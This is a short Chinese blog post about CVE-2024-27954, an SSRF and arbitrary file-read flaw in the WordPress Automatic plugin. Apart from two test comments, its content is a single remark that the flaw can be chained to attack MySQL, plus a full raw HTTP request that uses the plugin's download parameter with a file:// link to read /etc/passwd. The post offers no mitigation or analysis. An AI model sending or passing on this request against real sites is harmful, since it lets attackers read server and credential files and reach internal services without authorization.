向生活弯了腰的少年

疯狂造句中......

爱生活、爱自己、也爱她

切换

ssrf-cve-2024-27954-wordpress-automatic

最后更新于 2024-05-10 305 次阅读

任意文件读取配合SSRF，直接打mysql即可

GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Host: xxxxxxxxxxxxxxxxxx:443
Connection: close
Content-Length: 0

上一篇文章

CVE-2024-33644 Customify Site Library <= 0.0.9 – Unauthenticated Remote Code Execution

下一篇文章

GeoServer CVE-2024-36401 漏洞利用

查看评论 - 2 条评论

Comments 2 条评论

博主 mrtcsy

回复

发布于 2024-05-16 10:22 ( Chrome 124 Windows 10/11 )( ) 来自: Reserved Address

测试
博主 mrtcsy

回复

发布于 2024-05-16 10:23 ( Chrome 124 Windows 10/11 )( ) 来自:
Warning: 通过Sakurairo获取IP地理位置失败：cURL error 28: Connection timed out after 5000 milliseconds in /www/wwwroot/blog.cylovecq.top/wp/wp-content/themes/Sakurairo-2.7.2/inc/classes/IpLocation.php on line 40

Warning: 获取IP地理位置失败 in /www/wwwroot/blog.cylovecq.top/wp/wp-content/themes/Sakurairo-2.7.2/inc/classes/IpLocation.php on line 226
Unknown

继续测试